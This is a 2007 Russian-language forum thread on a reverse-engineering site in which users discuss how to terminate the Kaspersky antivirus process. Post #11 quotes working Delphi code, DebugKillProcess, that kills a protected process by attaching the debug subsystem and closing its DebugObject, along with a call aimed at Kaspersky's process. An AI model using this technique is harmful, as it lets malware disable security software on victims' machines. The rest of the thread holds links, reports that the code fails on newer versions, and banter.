Посл.ответ |
Сообщение |
 Ранг: 271.6 (наставник), 2thx Активность: 0.3↘0 Статус: Участник
|
Создано: 06 декабря 2007 09:31 · Личное сообщение · #1
Собственно как?
Сразу хочу оговориться, что пишу не трой, а прогу которая должна:
1) гасить каспера
2) удалять 2 ветки реестра
3) запускать каспера.
вот с первым пунктом и возникла проблема.
На системные запросы он не отвечает, даже со всеми привилегиями.
----- iNTERNATiONAL CoDE CReW | Сообщение посчитали полезным: |
|
 Ранг: 631.1 (!), 62thx Активность: 0.37↘0.01 Статус: Участник Автор VB Decompiler
|
Создано: 06 декабря 2007 09:33 · Поправил: GPcH · Личное сообщение · #2
habrahabr.ru/blog/infosecurity/29853.html
----- Никогда не делай то, что возможно. Стремись сделать то что невозможно впринципе! | Сообщение посчитали полезным: |
 Ранг: 271.6 (наставник), 2thx Активность: 0.3↘0 Статус: Участник
|
Создано: 06 декабря 2007 09:37 · Личное сообщение · #3
GPcH
Спасибо за информацию, но ведь там говориться о отключении защиты, а мне нужно чтобы завершился процесс avp.exe
----- iNTERNATiONAL CoDE CReW | Сообщение посчитали полезным: |
 Ранг: 631.1 (!), 62thx Активность: 0.37↘0.01 Статус: Участник Автор VB Decompiler
|
Создано: 06 декабря 2007 09:39 · Личное сообщение · #4
Spirit пишет:
Спасибо за информацию, но ведь там говориться о отключении защиты, а мне нужно чтобы завершился процесс avp.exe
Сорри не тот топик - читай выше. Просто как то на antimalvare натолкнулся на статью что выше.
----- Никогда не делай то, что возможно. Стремись сделать то что невозможно впринципе! | Сообщение посчитали полезным: |
 Ранг: 271.6 (наставник), 2thx Активность: 0.3↘0 Статус: Участник
|
Создано: 06 декабря 2007 09:48 · Личное сообщение · #5
GPcH
Огромнейшее спасибо, узнал много нового и интересного.
Теперь вот появилась пища для раздумий, нафига я юзаю такой дырявый авер =)
----- iNTERNATiONAL CoDE CReW | Сообщение посчитали полезным: |
 Ранг: 631.1 (!), 62thx Активность: 0.37↘0.01 Статус: Участник Автор VB Decompiler
|
Создано: 06 декабря 2007 09:52 · Личное сообщение · #6
Да я сам когда на эту статью наткнулся был не в восторге.
Хотя я этот авер и не юзаю.
Но в восьмерке обещают все исправить + ускорить работу за счет использования многопоточности.
----- Никогда не делай то, что возможно. Стремись сделать то что невозможно впринципе! | Сообщение посчитали полезным: |
 Ранг: 271.6 (наставник), 2thx Активность: 0.3↘0 Статус: Участник
|
Создано: 06 декабря 2007 09:59 · Личное сообщение · #7
хзхз
Я ставил себе восьмерку альфа2, он у меня страшно тормозил систему и кидал БСОДы.
Так что пока не выйдет нормальный релиз я больше эксперементировать не буду.
----- iNTERNATiONAL CoDE CReW | Сообщение посчитали полезным: |
 Ранг: 107.3 (ветеран), 5thx Активность: 0.2↘0.04 Статус: Участник
|
Создано: 06 декабря 2007 10:02 · Личное сообщение · #8
вот прога она может гасить каспера....
где-то были исходники но я не могу найти  81cf_05.12.2007_CRACKLAB.rU.tgz - Killer.exe
| Сообщение посчитали полезным: |
 Ранг: 111.1 (ветеран) Активность: 0.04↘0 Статус: Участник
|
Создано: 06 декабря 2007 10:07 · Личное сообщение · #9
Spirit
Попробуй здесь посмотри. Я по этой статье убивал Касперского.
ТЫЦ http://www.wasm.ru/article.php?article=apihook_2
----- The truth is out of there... | Сообщение посчитали полезным: |
 Ранг: 271.6 (наставник), 2thx Активность: 0.3↘0 Статус: Участник
|
Создано: 06 декабря 2007 10:10 · Личное сообщение · #10
Lumen
И у тебя получилось?
Я быстренько просмотрел код, вроде используются примитивные функции...
----- iNTERNATiONAL CoDE CReW | Сообщение посчитали полезным: |
 Ранг: 111.1 (ветеран) Активность: 0.04↘0 Статус: Участник
|
Создано: 06 декабря 2007 10:20 · Поправил: Lumen · Личное сообщение · #11
MS-Rem пишет:
Практическое применение:
Убиваем антивирус Касперского:
{ убивание процесса отладочным методом }
Function DebugKillProcess(ProcessId: dword): boolean;
var
pHandle: dword;
myPID: dword;
HandlesInfo: PSYSTEM_HANDLE_INFORMATION_EX;
r: dword;
begin
Result := false;
myPID := GetCurrentProcessId();
if not EnableDebugPrivilege() then Exit;
//подключаемся к системе отладки и получаем DebugObject
if DbgUiConnectToDbg() <> STATUS_SUCCESS then Exit;
pHandle := OpenProcessEx(ProcessId);
//включаем отладку процесса
if DbgUiDebugActiveProcess(pHandle) <> STATUS_SUCCESS then Exit;
//надо найти полученный DebugObject
HandlesInfo := GetInfoTable(SystemHandleInformation);
if HandlesInfo = nil then Exit;
for r := 0 to HandlesInfo^.NumberOfHandles do
if (HandlesInfo^.Information[r].ProcessId = myPID) and
(HandlesInfo^.Information[r].ObjectTypeNumber = $8) //DebugObject
then begin
//закрываем DebugObject, что приводит к уничтожению отлаживаемого процесса
CloseHandle(HandlesInfo^.Information[r].Handle);
Result := true;
break;
end;
VirtualFree(HandlesInfo, 0, MEM_RELEASE);
end;
После чего антивирус Касперского убивается одной строкой:
DebugKillProcess(GetProcessId('kavmm.exe'));
Также, этим методом можно убить почти любую программу, авторы которой заявляют, что она неубиваемая.
ЗЫ: Я правда не знаю, какая у тебя версия, но шестой каспер этим кодом убивается на ура...
----- The truth is out of there... | Сообщение посчитали полезным: |
 Ранг: 271.6 (наставник), 2thx Активность: 0.3↘0 Статус: Участник
|
Создано: 06 декабря 2007 11:45 · Поправил: Spirit · Личное сообщение · #12
[del]
----- iNTERNATiONAL CoDE CReW | Сообщение посчитали полезным: |
Ранг: 30.2 (посетитель) Активность: 0.01↘0 Статус: Участник
|
Создано: 06 декабря 2007 12:22 · Личное сообщение · #13
У кого нибудь есть это же код но на С++ , а то переводить, как -то не хочется изобретать велосипед если это уже кто-то сделал.
| Сообщение посчитали полезным: |
 Ранг: 271.6 (наставник), 2thx Активность: 0.3↘0 Статус: Участник
|
Создано: 06 декабря 2007 12:23 · Личное сообщение · #14
Эх! Не сработало.
Гасит любые процессы, кроме кашперовского.
----- iNTERNATiONAL CoDE CReW | Сообщение посчитали полезным: |
Ранг: 30.2 (посетитель) Активность: 0.01↘0 Статус: Участник
|
Создано: 06 декабря 2007 12:58 · Личное сообщение · #15
Если посмотреть сам источник ( rootkit.com/newsread.php?newsid=778 )
то там как я понял там сначало гасится csrss.exe а потом уже касперовский.
| Сообщение посчитали полезным: |
Ранг: 15.5 (новичок) Активность: 0.01↘0 Статус: Участник
|
Создано: 06 декабря 2007 13:53 · Личное сообщение · #16
гы
из csrss "достается" хпроцес касперского) а не гасится )
| Сообщение посчитали полезным: |
 Ранг: 1131.7 (!!!!), 447thx Активность: 0.67↘0.2 Статус: Участник
|
Создано: 06 декабря 2007 16:20 · Личное сообщение · #17
undb пишет:
то там как я понял там сначало гасится csrss.exe
гасить csrss.exe - это сильно
| Сообщение посчитали полезным: |
 Ранг: 279.1 (наставник) Активность: 0.16↘0 Статус: Участник wizard
|
Создано: 06 декабря 2007 16:47 · Личное сообщение · #18
Gideon Vi пишет:
гасить csrss.exe - это сильно
Ну и что получиш ребут компа и после загрузки сообщение ,что система восстановленна после системной ошибки .Какое практическое применение ?
----- Что один человек сделал , другой всегда сломать может... | Сообщение посчитали полезным: |
 Ранг: 1131.7 (!!!!), 447thx Активность: 0.67↘0.2 Статус: Участник
|
Создано: 06 декабря 2007 19:17 · Личное сообщение · #19
MACKLIA пишет:
Ну и что получиш ребут компа и после загрузки сообщение ,что система восстановленна после системной ошибки .Какое практическое применение ?
никакого - именно об этом я и сказал. неужели ирония столь незаметна?
| Сообщение посчитали полезным: |
Ранг: 55.7 (постоянный), 6thx Активность: 0.03↘0 Статус: Участник
|
Создано: 06 декабря 2007 21:26 · Личное сообщение · #20
Magister Yoda пишет:
вот прога она может гасить каспера....
что-то не гаситься каспер ею. даже окно главное закрыть не может (правда манипуляции с ним делает).
| Сообщение посчитали полезным: |
Ранг: 47.5 (посетитель) Активность: 0.03↘0 Статус: Участник
|
Создано: 07 декабря 2007 04:02 · Личное сообщение · #21
Lumen
Это очень старый код. Убивался только KAV 5.
Evol
Дык, тоько код с rootkits.com может что-то сделать, от остального у KAV\KIS защита уже есть!
| Сообщение посчитали полезным: |
Ранг: 228.7 (наставник), 2thx Активность: 0.12↘0 Статус: Участник malware research
|
Создано: 07 декабря 2007 04:47 · Личное сообщение · #22
HellStudent пишет:
тоько код с rootkits.com может что-то сделать, от остального у KAV\KIS защита уже есть!
Это вы так думаете
----- Research is my purpose | Сообщение посчитали полезным: |
 Ранг: 271.6 (наставник), 2thx Активность: 0.3↘0 Статус: Участник
|
Создано: 07 декабря 2007 06:29 · Личное сообщение · #23
Error_Log
Если у тебя есть идеи, пожалуйста поделись.
А то так хочется дописать прогу...
----- iNTERNATiONAL CoDE CReW | Сообщение посчитали полезным: |
 Ранг: 107.3 (ветеран), 5thx Активность: 0.2↘0.04 Статус: Участник
|
Создано: 07 декабря 2007 08:10 · Личное сообщение · #24
я так и не понял прога которую я оттачил не работает?
| Сообщение посчитали полезным: |
 Ранг: 271.6 (наставник), 2thx Активность: 0.3↘0 Статус: Участник
|
Создано: 07 декабря 2007 08:16 · Личное сообщение · #25
Magister Yoda
мне не нужна твоя программа. мне нужен код.
----- iNTERNATiONAL CoDE CReW | Сообщение посчитали полезным: |
 Ранг: 107.3 (ветеран), 5thx Активность: 0.2↘0.04 Статус: Участник
|
Создано: 07 декабря 2007 08:44 · Личное сообщение · #26
если она работает то я постараюсь найти код
| Сообщение посчитали полезным: |
 Ранг: 990.2 (! ! !), 380thx Активность: 0.68↘0 Статус: Модератор Author of DiE
|
Создано: 07 декабря 2007 12:38 · Личное сообщение · #27
Spirit пишет:
мне не нужна твоя программа. мне нужен код.
тыж реверсер, засунул в иду прогу и получил исходник на си
----- [nice coder and reverser] | Сообщение посчитали полезным: |
 Ранг: 271.6 (наставник), 2thx Активность: 0.3↘0 Статус: Участник
|
Создано: 07 декабря 2007 12:45 · Личное сообщение · #28
Hellspawn
Эмм...а что такое ида и что такое с++?
И еще вопрос, кто такой реверсер?
----- iNTERNATiONAL CoDE CReW | Сообщение посчитали полезным: |
 Ранг: 271.6 (наставник), 2thx Активность: 0.3↘0 Статус: Участник
|
Создано: 07 декабря 2007 15:22 · Личное сообщение · #29
Эмм...новых идей так и не появилось?
----- iNTERNATiONAL CoDE CReW | Сообщение посчитали полезным: |
 Ранг: 107.3 (ветеран), 5thx Активность: 0.2↘0.04 Статус: Участник
|
Создано: 07 декабря 2007 17:13 · Личное сообщение · #30 |